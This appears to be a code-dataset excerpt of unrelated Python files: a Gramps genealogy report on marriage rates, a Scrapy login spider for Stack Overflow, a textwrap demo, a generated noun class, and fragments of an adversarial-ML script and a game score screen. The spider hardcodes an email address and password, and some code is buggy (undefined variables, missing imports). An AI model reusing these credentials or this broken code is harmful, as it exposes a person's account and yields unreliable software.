f'*experiment_results-*{args.tag}*'),\n # skip_pattern=r'(^simes)|(^fusion)',\n include_pattern=r'(.*)', output=os.path.join(args.results_root,args.tag))\npass\n\n# record = th.load(f'record-{args.dataset}.pth')\n# adv_tag = 'FGSM_0.1'\n# layer_inputs = recorded[layer_name]\n# layer_inputs_fgsm = recorded[f'{layer_name}-@{adv_tag}']\n# def _maybe_slice(tensor, nsamples=-1):\n# if nsamples > 0:\n# return tensor[0:nsamples]\n# return tensor\n#\n# for layer_name in args.plot_layer_names:\n# clean_act = _maybe_slice(record[layer_name + '_forward_input:0'])\n# fgsm_act = _maybe_slice(record[layer_name + f'_forward_input:0-@{adv_tag}'])\n#\n# plot(clean_act, fgsm_act, layer_name, reference_stats=ref_stats, rank_by_stats_loss=True, max_ratio=False)\n# plt.waitforbuttonpress()\n","sub_path":"adversarial_compare.py","file_name":"adversarial_compare.py","file_ext":"py","file_size_in_byte":39939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"202104313","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n# author: bigfoolliu\n\n\n\"\"\"\ntextwrap模块使用\n\n标准模块textwrap用以解决当多级缩进里出现多行字符串的情况\n\"\"\"\n\nfrom textwrap import dedent\n\n\ndef basic_demo():\n \"\"\"使用这种方式的话输出的字符串会包含左侧的缩进空格\"\"\"\n msg = ''\n if True:\n msg = \"\"\"\n Welcome, today's movie list:\n - Jaw (1975)\n - The Shining (1980)\n - Saw (2004)\"\"\"\n print(msg)\n\n\ndef basic_demo2():\n \"\"\"使用这种方式不会包含左侧的缩进空格\"\"\"\n msg = ''\n if True:\n msg = dedent(\"\"\"\\\n Welcome, today's movie list:\n - Jaw (1975)\n - The Shining (1980)\n - Saw (2004)\"\"\")\n print(msg)\n\n\ndef main():\n basic_demo()\n basic_demo2()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"language/python/modules/System/textwrap/textwrap_module.py","file_name":"textwrap_module.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"553200271","text":"\n\nfrom xai.brain.wordbase.nouns._chiropractor import _CHIROPRACTOR\n\n#calss header\nclass _CHIROPRACTORS(_CHIROPRACTOR, ):\n\tdef __init__(self,): \n\t\t_CHIROPRACTOR.__init__(self)\n\t\tself.name = \"CHIROPRACTORS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"chiropractor\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_chiropractors.py","file_name":"_chiropractors.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"274240326","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Gramps - a GTK+/GNOME based genealogy program\n#\n# Copyright (C) 2008,2011 Gary Burton\n# Copyright (C) 2010 Jakim Friant\n# Copyright (C) 2011 Heinz Brinker\n# Copyright (C) 2013-2014 Paul Franklin\n# Copyright (C) 2015 Hans Ulrich Frink\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\"\"\"ledigquote Report\"\"\"\n\n#------------------------------------------------------------------------\n#\n# python modules\n#\n#------------------------------------------------------------------------\n\n#------------------------------------------------------------------------\n#\n# gramps modules\n#\n#------------------------------------------------------------------------\nfrom gramps.gen.const import GRAMPS_LOCALE as glocale\n_ = glocale.translation.gettext\nfrom gramps.gen.plug.menu import (FilterOption, PlaceListOption,\n EnumeratedListOption, BooleanOption)\nfrom gramps.gen.plug.report import Report\nfrom gramps.gen.plug.report import MenuReportOptions\nfrom gramps.gen.plug.report import stdoptions\nfrom gramps.gen.plug.docgen import (IndexMark, FontStyle, ParagraphStyle,\n TableStyle, TableCellStyle,\n FONT_SANS_SERIF, FONT_SERIF, \n INDEX_TYPE_TOC, PARA_ALIGN_CENTER)\nfrom gramps.gen.proxy import PrivateProxyDb\nfrom gramps.gen.sort import Sort\nfrom gramps.gen.utils.location import get_main_location\nfrom gramps.gen.utils.db import get_birth_or_fallback, get_death_or_fallback\nfrom gramps.gen.display.place import displayer as place_displayer\nfrom gramps.gen.lib import PlaceType\nfrom gramps.gen.lib import NameType, EventRoleType, EventType\nfrom gramps.gen.plug.report import utils as ReportUtils\nfrom gramps.gen.config import config\n#from gramps.gen.datehandler import get_date\n\nfrom collections import OrderedDict\nfrom operator import itemgetter\n\ncal = config.get('preferences.calendar-format-report')\n\nclass ledigquote(Report):\n \"\"\"\n ledigquote Report class\n \"\"\"\n def __init__(self, database, options, user):\n \"\"\"\n Create the ledigquote Report object produces the ledigquote report.\n \n The arguments are:\n\n database - the GRAMPS database instance\n options - instance of the Options class for this report\n user - instance of a gen.user.User class\n\n This report needs the following parameters (class variables)\n that come in the options class.\n \n places - List of places to report on.\n# classwidth - classwidth of report, person or event\n incpriv - Whether to include private data\n\n \"\"\"\n\n Report.__init__(self, database, options, user)\n\n self._user = user\n menu = options.menu\n places = menu.get_option_by_name('places').get_value()\n self.classwidth = menu.get_option_by_name('classwidth').get_value()\n self.incpriv = menu.get_option_by_name('incpriv').get_value()\n\n self.set_locale(menu.get_option_by_name('trans').get_value())\n\n name_format = menu.get_option_by_name(\"name_format\").get_value()\n if name_format != 0:\n self._name_display.set_default_format(name_format)\n self._nd = self._name_display\n \n if self.incpriv:\n self.database = database\n else:\n self.database = PrivateProxyDb(database)\n\n filter_option = menu.get_option_by_name('filter')\n self.filter = filter_option.get_filter()\n self.sort = Sort(self.database)\n\n if self.filter.get_name() != '':\n # Use the selected filter to provide a list of place handles\n plist = self.database.iter_place_handles()\n self.place_handles = self.filter.apply(self.database, plist)\n else:\n # Use the place handles selected without a filter\n self.place_handles = self.__get_place_handles(places)\n\n self.place_handles.sort(key=self.sort.by_place_title_key)\n \n def write_report(self):\n \"\"\"\n The routine that actually creates the report.\n At this point, the document is opened and ready for writing.\n \"\"\"\n\n # Write the title line. Set in INDEX marker so that this section will be\n # identified as a major category if this is included in a Book report.\n\n title = self._(\"Ledigenquote und Verheiratetenanteile \")\n mark = IndexMark(title, INDEX_TYPE_TOC, 1) \n self.doc.start_paragraph(\"PLC-ReportTitle\")\n self.doc.write_text(title, mark)\n self.doc.end_paragraph()\n\n self.doc.start_paragraph(\"PLC-Section\")\n self.doc.write_text(\"Enthält alle Personen, die in diesem Ort geboren oder getauft wurden\")\n self.doc.end_paragraph()\n self.doc.start_table(\"LEQUODETTable\", \"SRC-LEQUODETTable\")\n column_titles = [_(\"name\"), _(\"ID\"), _(\"m/w\"), _(\"birth\"), _(\"death\"), _(\"marriage\"), _(\"date\"), _(\"weitere Heiraten\"), _(\"Alter Tod\"), _(\"Alter Hochzeit\"), _(\"place\"), _(\"LNR\") ] \n i = 0\n self.doc.start_row()\n for title in column_titles:\n self.doc.start_cell(\"SRC-TableColumn\")\n self.doc.start_paragraph(\"SRC-ColumnTitle\")\n self.doc.write_text(title)\n self.doc.end_paragraph()\n self.doc.end_cell()\n self.doc.end_row()\n\n self.__write_data()\n\n self.doc.end_table()\n \n# Männer Tabelle \n self.doc.start_paragraph(\"PLC-Section\")\n self.doc.write_text(\"Ledigenquote und Verheiratetenanteile bei Männern\")\n self.doc.end_paragraph()\n self.doc.start_table(\"LEQUODETTable\", \"SRC-LEQUODETTable\")\n column_titles = [_(\"cat\"), _(\"ID\"), _(\"m/w\"), _(\"birth\"), _(\"death\"), _(\"marriage\"), _(\"date\"), _(\"weitere Heiraten\"), _(\"Alter Tod\"), _(\"Alter Hochzeit\"), _(\"place\"), _(\"LNR\") ] \n i = 0\n self.doc.start_row()\n for title in column_titles:\n self.doc.start_cell(\"SRC-TableColumn\")\n self.doc.start_paragraph(\"SRC-ColumnTitle\")\n self.doc.write_text(title)\n self.doc.end_paragraph()\n self.doc.end_cell()\n self.doc.end_row()\n\n self.__write_statistics(pdet_list)\n\n self.doc.end_table()\n\n def __write_data(self):\n \"\"\"\n This procedure writes out each of the families related to the place\n \"\"\"\n i = 0\n iw = 0\n ifam = 0\n p_set=set()\n pdet_list=[]\n QUAL_ESTIMATED = 1\n gender_dict ={0:\"w\",1:\"m\", 2:\"u\"}\n\n\n for person in self.database.iter_people():\n birth_event = get_birth_or_fallback(self.database, person)\n b_year = 0\n alt_tod = 0\n b_role = \"ROLLE\"\n if birth_event:\n if birth_event.get_place_handle() in self.place_handles:\n birth_obj = birth_event.get_date_object()\n if birth_obj.get_quality() is not QUAL_ESTIMATED:\n place_d = place_displayer.display_event(self.database, birth_event) \n person_name = person.get_primary_name().get_surname()\n person_ID = person.get_gramps_id()\n gender = gender_dict[person.get_gender()]\n\n m_date = self._get_date(birth_obj)\n # if birth_obj.get_quality() is not QUAL_ESTIMATED:\n b_year = birth_obj.get_year()\n # b_role = \"ROLLE \"+ str(birth_event.role)\n # b_place = \n death_event = get_death_or_fallback(self.database, person)\n d_year = 0\n if death_event:\n death_obj = death_event.get_date_object()\n # if death_obj.get_quality() is not QUAL_ESTIMATED:\n d_year = death_obj.get_year() \n alt_tod = d_year - b_year\n m_year = 0 \n \n alt_marr = 0\n \n m_list=[]\n # m_date = \"\"\n m_wm = \"WEIT\"\n for family_handle in person.get_family_handle_list():\n # print(family_handle)\n family = self.database.get_family_from_handle(family_handle)\n \n for fam_event_ref in family.get_event_ref_list():\n # print(fam_event_ref)\n if fam_event_ref:\n fam_event = self.database.get_event_from_handle(fam_event_ref.ref)\n if fam_event.type == EventType.MARRIAGE:\n print(fam_event.type)\n m_list.append(fam_event.get_date_object().get_year())\n # print(fam_event.get_date_object().get_year())\n # m_year = fam_event.get_date_object().get_year()\n if len(m_list)>0:\n m_year = min(m_list)\n alt_marr = m_year - b_year\n # else:\n # m_year = 0 \n for m in m_list:\n m_wm = m_wm+\" \"+str(m) \n \n \n # person_details = [ person, person_name, person_ID, gender, b_year, d_year, m_year, b_role, m_date, diff,place_d]\n person_details = [ person, person_name, person_ID, gender, b_year, d_year, m_year, m_date, m_wm, alt_tod, alt_marr, place_d]\n \n pdet_list.append(person_details)\n i=1\n for pn in pdet_list:\n self.doc.start_row()\n \n# self.doc.start_cell(\"SRC-TableColumn\")\n# self.doc.start_paragraph(\"SRC-ColumnTitle\")\n# ST = \"PN\"+ str(pn[0])\n# self.doc.write_text(_(\"%s\") % ST)\n# # self.doc.write_text(_(\"Hallo0\"))\n# self.doc.end_paragraph()\n# self.doc.end_cell()\n \n self.doc.start_cell(\"SRC-TableColumn\")\n self.doc.start_paragraph(\"SRC-ColumnTitle\")\n self.doc.write_text(_(\"%s\") % pn[1])\n # self.doc.write_text(_(\"Hallo1\"))\n self.doc.end_paragraph()\n self.doc.end_cell()\n \n self.doc.start_cell(\"SRC-TableColumn\")\n self.doc.start_paragraph(\"SRC-ColumnTitle\")\n self.doc.write_text(_(\"%s\") % pn[2])\n # self.doc.write_text(_(\"Hallo2\"))\n self.doc.end_paragraph()\n self.doc.end_cell()\n \n self.doc.start_cell(\"SRC-TableColumn\")\n self.doc.start_paragraph(\"SRC-ColumnTitle\")\n self.doc.write_text(_(\"%s\") % pn[3])\n # self.doc.write_text(_(\"Hallo3\"))\n self.doc.end_paragraph()\n self.doc.end_cell()\n \n self.doc.start_cell(\"SRC-TableColumn\")\n self.doc.start_paragraph(\"SRC-ColumnTitle\")\n self.doc.write_text(_(\"%s\") % pn[4])\n # self.doc.write_text(_(\"Hallo4\"))\n self.doc.end_paragraph()\n self.doc.end_cell()\n \n self.doc.start_cell(\"SRC-TableColumn\")\n self.doc.start_paragraph(\"SRC-ColumnTitle\")\n self.doc.write_text(_(\"%s\") % pn[5])\n # self.doc.write_text(_(\"Hallo5\"))\n self.doc.end_paragraph()\n self.doc.end_cell()\n \n self.doc.start_cell(\"SRC-TableColumn\")\n self.doc.start_paragraph(\"SRC-ColumnTitle\")\n self.doc.write_text(_(\"%s\") % pn[6])\n # self.doc.write_text(_(\"Hallo6\"))\n self.doc.end_paragraph()\n self.doc.end_cell()\n\n self.doc.start_cell(\"SRC-TableColumn\")\n self.doc.start_paragraph(\"SRC-ColumnTitle\")\n self.doc.write_text(_(\"%s\") % pn[7])\n # self.doc.write_text(_(\"Hallo7\"))\n self.doc.end_paragraph()\n self.doc.end_cell()\n\n \n self.doc.start_cell(\"SRC-TableColumn\")\n self.doc.start_paragraph(\"SRC-ColumnTitle\")\n self.doc.write_text(_(\"%s\") % pn[8])\n # self.doc.write_text(_(\"Hallo8\"))\n self.doc.end_paragraph()\n self.doc.end_cell()\n\n self.doc.start_cell(\"SRC-TableColumn\")\n self.doc.start_paragraph(\"SRC-ColumnTitle\")\n self.doc.write_text(_(\"%s\") % pn[9])\n # self.doc.write_text(_(\"Hallo9\"))\n self.doc.end_paragraph()\n self.doc.end_cell()\n\n \n self.doc.start_cell(\"SRC-TableColumn\")\n self.doc.start_paragraph(\"SRC-ColumnTitle\")\n# diff= pn[6] - pn[4]\n self.doc.write_text(_(\"%s\") % pn[10])\n# self.doc.write_text(diff)\n self.doc.end_paragraph()\n self.doc.end_cell()\n\n self.doc.start_cell(\"SRC-TableColumn\")\n self.doc.start_paragraph(\"SRC-ColumnTitle\")\n self.doc.write_text(_(\"%s\") % pn[11])\n self.doc.end_paragraph()\n self.doc.end_cell()\n\n self.doc.start_cell(\"SRC-TableColumn\")\n self.doc.start_paragraph(\"SRC-ColumnTitle\")\n self.doc.write_text(_(\"%s\") % i)\n # self.doc.write_text(i)\n # self.doc.write_text(_(\"LNR\"))\n self.doc.end_paragraph()\n self.doc.end_cell()\n i +=1\n\n\n self.doc.end_row()\n\n#########################\n def __write_statistics(self,list):\n \"\"\"\n This procedure writes out each of the families related to the place\n \"\"\"\n# build classes\n #year_list = list(pdet_list[4])\n print(min(list[4]))\n #cm=min()\n# i=1\n# for pn in pdet_list:\n# self.doc.start_row()\n# \n## self.doc.start_cell(\"SRC-TableColumn\")\n## self.doc.start_paragraph(\"SRC-ColumnTitle\")\n## ST = \"PN\"+ str(pn[0])\n## self.doc.write_text(_(\"%s\") % ST)\n## # self.doc.write_text(_(\"Hallo0\"))\n## self.doc.end_paragraph()\n## self.doc.end_cell()\n# \n# self.doc.start_cell(\"SRC-TableColumn\")\n# self.doc.start_paragraph(\"SRC-ColumnTitle\")\n# self.doc.write_text(_(\"%s\") % pn[1])\n# # self.doc.write_text(_(\"Hallo1\"))\n# self.doc.end_paragraph()\n# self.doc.end_cell()\n# \n# self.doc.start_cell(\"SRC-TableColumn\")\n# self.doc.start_paragraph(\"SRC-ColumnTitle\")\n# self.doc.write_text(_(\"%s\") % pn[2])\n# # self.doc.write_text(_(\"Hallo2\"))\n# self.doc.end_paragraph()\n# self.doc.end_cell()\n# \n# self.doc.start_cell(\"SRC-TableColumn\")\n# self.doc.start_paragraph(\"SRC-ColumnTitle\")\n# self.doc.write_text(_(\"%s\") % pn[3])\n# # self.doc.write_text(_(\"Hallo3\"))\n# self.doc.end_paragraph()\n# self.doc.end_cell()\n# \n# self.doc.start_cell(\"SRC-TableColumn\")\n# self.doc.start_paragraph(\"SRC-ColumnTitle\")\n# self.doc.write_text(_(\"%s\") % pn[4])\n# # self.doc.write_text(_(\"Hallo4\"))\n# self.doc.end_paragraph()\n# self.doc.end_cell()\n# \n# self.doc.start_cell(\"SRC-TableColumn\")\n# self.doc.start_paragraph(\"SRC-ColumnTitle\")\n# self.doc.write_text(_(\"%s\") % pn[5])\n# # self.doc.write_text(_(\"Hallo5\"))\n# self.doc.end_paragraph()\n# self.doc.end_cell()\n# \n# self.doc.start_cell(\"SRC-TableColumn\")\n# self.doc.start_paragraph(\"SRC-ColumnTitle\")\n# self.doc.write_text(_(\"%s\") % pn[6])\n# # self.doc.write_text(_(\"Hallo6\"))\n# self.doc.end_paragraph()\n# self.doc.end_cell()\n#\n# self.doc.start_cell(\"SRC-TableColumn\")\n# self.doc.start_paragraph(\"SRC-ColumnTitle\")\n# self.doc.write_text(_(\"%s\") % pn[7])\n# # self.doc.write_text(_(\"Hallo7\"))\n# self.doc.end_paragraph()\n# self.doc.end_cell()\n#\n# self.doc.start_cell(\"SRC-TableColumn\")\n# self.doc.start_paragraph(\"SRC-ColumnTitle\")\n# self.doc.write_text(_(\"%s\") % pn[8])\n# # self.doc.write_text(_(\"Hallo8\"))\n# self.doc.end_paragraph()\n# self.doc.end_cell()\n#\n# self.doc.start_cell(\"SRC-TableColumn\")\n# self.doc.start_paragraph(\"SRC-ColumnTitle\")\n# self.doc.write_text(_(\"%s\") % pn[9])\n# # self.doc.write_text(_(\"Hallo9\"))\n# self.doc.end_paragraph()\n# self.doc.end_cell()\n#\n# \n# self.doc.start_cell(\"SRC-TableColumn\")\n# self.doc.start_paragraph(\"SRC-ColumnTitle\")\n## diff= pn[6] - pn[4]\n# self.doc.write_text(_(\"%s\") % pn[10])\n## self.doc.write_text(diff)\n# self.doc.end_paragraph()\n # self.doc.end_cell()\n #\n # self.doc.start_cell(\"SRC-TableColumn\")\n # self.doc.start_paragraph(\"SRC-ColumnTitle\")\n # self.doc.write_text(_(\"%s\") % pn[11])\n # self.doc.end_paragraph()\n # self.doc.end_cell()\n #\n # self.doc.start_cell(\"SRC-TableColumn\")\n # self.doc.start_paragraph(\"SRC-ColumnTitle\")\n # self.doc.write_text(_(\"%s\") % i)\n ## self.doc.write_text(i)\n # # self.doc.write_text(_(\"LNR\"))\n # self.doc.end_paragraph()\n # self.doc.end_cell()\n # i +=1\n #\n #\n # self.doc.end_row()\n #\n#########################\n \n def __format_date(self, date_object):\n if not date_object: return\n d=date_object.get_day() \n m=date_object.get_month()\n y=date_object.get_year()\n if (d == 0) and (m == 0):\n date_f = (\" %s\" % y)\n elif (d == 0) and not (m == 0):\n date_f = (\" %s.%s\" % (m, y)) \n else: \n date_f = (\" %s.%s.%s\" % (d, m, y)) \n return date_f \n \n\n \n def __get_place_handles(self, places):\n \"\"\"\n This procedure converts a string of place GIDs to a list of handles\n \"\"\"\n place_handles = [] \n for place_gid in places.split():\n place = self.database.get_place_from_gramps_id(place_gid)\n if place is not None:\n place_handles.append(place.get_handle())\n\n return place_handles\n \n#------------------------------------------------------------------------\n#\n# ledigquoteOptions\n#\n#------------------------------------------------------------------------\nclass ledigquoteOptions(MenuReportOptions):\n\n \"\"\"\n Defines options and provides handling interface.\n \"\"\"\n\n def __init__(self, name, database):\n MenuReportOptions.__init__(self, name, database)\n \n def add_menu_options(self, menu):\n \"\"\"\n Add options to the menu for the place report.\n \"\"\"\n category_name = _(\"Report Options\")\n\n # Reload filters to pick any new ones\n CustomFilters = None\n from gramps.gen.filters import CustomFilters, GenericFilter\n\n opt = FilterOption(_(\"Select using filter\"), 0)\n opt.set_help(_(\"Select places using a filter\"))\n filter_list = []\n filter_list.append(GenericFilter())\n filter_list.extend(CustomFilters.get_filters('Place'))\n opt.set_filters(filter_list)\n menu.add_option(category_name, \"filter\", opt)\n\n stdoptions.add_name_format_option(menu, category_name)\n\n places = PlaceListOption(_(\"Select places individually\"))\n places.set_help(_(\"List of places to report on\"))\n menu.add_option(category_name, \"places\", places)\n\n classwidth = EnumeratedListOption(_(\"Class wdith\"), \"classwidth\")\n classwidth.set_items([\n (\"20 Years\", _(\"10 Years\")),\n (\"20 Years\", _(\"20 Years\"))])\n classwidth.set_help(_(\"classwidth fpr Analysis\"))\n menu.add_option(category_name, \"classwidth\", classwidth)\n\n incpriv = BooleanOption(_(\"Include private data\"), True)\n incpriv.set_help(_(\"Whether to include private data\"))\n menu.add_option(category_name, \"incpriv\", incpriv)\n \n stdoptions.add_localization_option(menu, category_name)\n\n def make_default_style(self, default_style):\n \"\"\"\n Make the default output style for the Place report.\n \"\"\"\n self.default_style = default_style\n self.__report_title_style()\n self.__source_title_style()\n self.__source_details_style()\n self.__citation_title_style()\n self.__column_title_style()\n self.__column_title_head_style()\n self.__section_style()\n self.__LEQUODET_table_style()\n self.__details_style()\n self.__cell_style()\n self.__table_column_style()\n self.__report_footer_style()\n\n\n def __report_footer_style(self):\n \"\"\"\n Define the style used for the report footer\n \"\"\" \n \n font = FontStyle()\n font.set_size(8)\n para = ParagraphStyle()\n para.set_font(font)\n para.set_alignment(PARA_ALIGN_CENTER)\n para.set_top_border(True)\n para.set_top_margin(ReportUtils.pt2cm(8))\n para.set_description(_('The style used for the footer.'))\n self.default_style.add_paragraph_style('SRC-Footer', para)\n \n def __report_title_style(self):\n \"\"\"\n Define the style used for the report title\n \"\"\"\n font = FontStyle()\n font.set(face=FONT_SERIF, size=16, bold=1)\n para = ParagraphStyle()\n para.set_font(font)\n para.set_header_level(1)\n para.set_top_margin(0.25)\n para.set_bottom_margin(0.25)\n para.set_alignment(PARA_ALIGN_CENTER) \n para.set_description(_('The style used for the title of the report.'))\n self.default_style.add_paragraph_style(\"PLC-ReportTitle\", para)\n\n def __source_title_style(self):\n \"\"\"\n Define the style used for the source title\n \"\"\"\n font = FontStyle()\n font.set(face=FONT_SERIF, size=12, italic=0, bold=1)\n para = ParagraphStyle()\n para.set_font(font)\n para.set_header_level(2)\n para.set(first_indent=0.0, lmargin=0.0)\n para.set_top_margin(0.75)\n para.set_bottom_margin(0.25) \n para.set_description(_('The style used for source title.'))\n self.default_style.add_paragraph_style(\"SRC-SourceTitle\", para)\n \n def __citation_title_style(self):\n \"\"\"\n Define the style used for the citation title\n \"\"\"\n font = FontStyle()\n font.set(face=FONT_SERIF, size=12, italic=0, bold=1)\n para = ParagraphStyle()\n para.set_font(font)\n para.set_header_level(3)\n para.set(first_indent=0.0, lmargin=0.0)\n para.set_top_margin(0.75)\n para.set_bottom_margin(0.0) \n para.set_description(_('The style used for citation title.'))\n self.default_style.add_paragraph_style(\"SRC-CitationTitle\", para)\n\n def __source_details_style(self):\n \"\"\"\n Define the style used for the place details\n \"\"\"\n font = FontStyle()\n font.set(face=FONT_SERIF, size=10)\n para = ParagraphStyle()\n para.set_font(font)\n para.set(first_indent=0.0, lmargin=0.0)\n para.set_description(_('The style used for Source details.'))\n self.default_style.add_paragraph_style(\"PLC-SourceDetails\", para)\n\n def __column_title_style(self):\n \"\"\"\n Define the style used for the event table column title\n \"\"\"\n font = FontStyle()\n font.set(face=FONT_SERIF, size=10, bold=1)\n para = ParagraphStyle()\n para.set_font(font)\n para.set(first_indent=0.0, lmargin=0.0)\n para.set_description(_('The style used for a column title.'))\n self.default_style.add_paragraph_style(\"SRC-ColumnTitle\", para)\n\n def __column_title_head_style(self):\n \"\"\"\n Define the style used for the event table column title\n \"\"\"\n font = FontStyle()\n font.set(face=FONT_SERIF, size=10, bold=1)\n para = ParagraphStyle()\n para.set_font(font)\n para.set_header_level(3)\n para.set(first_indent=0.0, lmargin=0.0)\n para.set_description(_('The style used for a column title incl headerlevel.'))\n self.default_style.add_paragraph_style(\"SRC-ColumnTitleHead\", para)\n\n\n def __section_style(self):\n \"\"\"\n Define the style used for each section\n \"\"\"\n font = FontStyle()\n font.set(face=FONT_SERIF, size=10, italic=0, bold=0)\n para = ParagraphStyle()\n para.set_font(font)\n# para.set(first_indent=-1.5, lmargin=1.5)\n para.set(first_indent=0.0, lmargin=0.0)\n\n para.set_top_margin(0.5)\n para.set_bottom_margin(0.25) \n para.set_description(_('The style used for each section.'))\n self.default_style.add_paragraph_style(\"PLC-Section\", para)\n\n def __LEQUODET_table_style(self):\n \"\"\"\n Define the style used for event table\n \"\"\"\n table = TableStyle()\n table.set_width(100)\n table.set_columns(14)\n table.set_column_width(0, 8)\n table.set_column_width(1, 3)\n table.set_column_width(2, 6)\n table.set_column_width(3, 6)\n table.set_column_width(4, 6)\n table.set_column_width(5, 6)\n table.set_column_width(6, 6)\n table.set_column_width(7, 12)\n table.set_column_width(8, 6)\n table.set_column_width(9, 30)\n table.set_column_width(10, 5)\n\n self.default_style.add_table_style(\"SRC-LEQUODETTable\", table) \n\n def __details_style(self):\n \"\"\"\n Define the style used for person and event details\n \"\"\"\n font = FontStyle()\n font.set(face=FONT_SERIF, size=10)\n para = ParagraphStyle()\n para.set_font(font)\n para.set_description(_('The style used for event and person details.'))\n self.default_style.add_paragraph_style(\"PLC-Details\", para)\n\n def __cell_style(self):\n \"\"\"\n Define the style used for cells in the event table\n \"\"\"\n cell = TableCellStyle()\n self.default_style.add_cell_style(\"SRC-Cell\", cell)\n\n def __table_column_style(self):\n \"\"\"\n Define the style used for event table columns\n \"\"\"\n cell = TableCellStyle()\n cell.set_bottom_border(1)\n self.default_style.add_cell_style('SRC-TableColumn', cell)\n \n","sub_path":"MYtextreport/ledigquote-v3.py","file_name":"ledigquote-v3.py","file_ext":"py","file_size_in_byte":27524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"430943515","text":"from scrapy.spiders import Spider\n\nfrom scrapy.selector import Selector\n\n\nclass SteamUrls(Spider):\n name = \"stack_spider\"\n start_urls = ['https://stackoverflow.com/']\n\n headers = {\n \"host\": \"cdn.sstatic.net\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n \"Accept-Encoding\": \"gzip, deflate, br\",\n \"Accept-Language\": \"en-US,en;q=0.5\",\n \"Connection\": \"keep-alive\",\n \"Content-Type\": \" application/x-www-form-urlencoded; charset=UTF-8\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0\"\n }\n\n # 重写了爬虫类的方法, 实现了自定义请求, 运行成功后会调用callback回调函数\n def start_requests(self):\n return [Request(\"https://stackoverflow.com/users/login\",\n meta={\n # 'dont_redirect': True,\n # 'handle_httpstatus_list': [302],\n 'cookiejar': 1},\n callback=self.post_login)] # 添加了meta\n\n # FormRequeset\n\n def post_login(self, response):\n # 请求网页后返回网页中的_xsrf字段的文字, 用于成功提交表单\n fkey = Selector(response).xpath('//input[@name=\"fkey\"]/@value').extract()[0]\n ssrc = Selector(response).xpath('//input[@name=\"ssrc\"]/@value').extract()[0]\n print (fkey)\n print (ssrc)\n # FormRequeset.from_response是Scrapy提供的一个函数, 用于post表单\n # 登陆成功后, 会调用after_login回调函数\n return [FormRequest.from_response(response,\n meta={\n # 'dont_redirect': True,\n # 'handle_httpstatus_list': [302],\n 'cookiejar': response.meta['cookiejar']}, # 注意这里cookie的获取\n headers=self.headers,\n formdata={\n \"fkey\": fkey,\n \"ssrc\": ssrc,\n \"email\": \"1045608243@qq.com\",\n \"password\": \"12345\",\n \"oauth_version\": \"\",\n \"oauth_server\": \"\",\n \"openid_username\": \"\",\n \"openid_identifier\": \"\"\n },\n callback=self.after_login,\n dont_filter=True\n )]\n\n def after_login(self, response):\n filename = \"1.html\"\n with open(filename, 'wb') as fp:\n fp.write(response.body)","sub_path":"Scrapy/zyd/zyd/spiders/get_detail_table.py","file_name":"get_detail_table.py","file_ext":"py","file_size_in_byte":2978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"532345237","text":"# Copyright (c) 2011-2020 Eric Froemling\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n# -----------------------------------------------------------------------------\n\"\"\"Provides a score screen for coop games.\"\"\"\n# pylint: disable=too-many-lines\n\nfrom __future__ import annotations\n\nimport random\nfrom typing import TYPE_CHECKING\n\nimport _ba\nimport ba\nfrom ba.internal import get_achievements_for_coop_level\nfrom bastd.actor.text import Text\nfrom bastd.actor.zoomtext import ZoomText\n\nif TYPE_CHECKING:\n from typing import Optional, Tuple, List, Dict, Any, Sequence\n from bastd.ui.store.button import StoreButton\n from bastd.ui.league.rankbutton import LeagueRankButton\n\n\nclass CoopScoreScreen(ba.Activity[ba.Player, ba.Team]):\n \"\"\"Score screen showing the results of a cooperative game.\"\"\"\n\n def __init__(self, settings: dict):\n # pylint: disable=too-many-statements\n super().__init__(settings)\n\n # Keep prev activity alive while we fade in\n self.transition_time = 0.5\n self.inherits_tint = True\n self.inherits_vr_camera_offset = True\n self.inherits_music = True\n self.use_fixed_vr_overlay = True\n\n self._do_new_rating: bool = self.session.tournament_id is not None\n\n self._score_display_sound = ba.getsound('scoreHit01')\n self._score_display_sound_small = ba.getsound('scoreHit02')\n self.drum_roll_sound = ba.getsound('drumRoll')\n self.cymbal_sound = 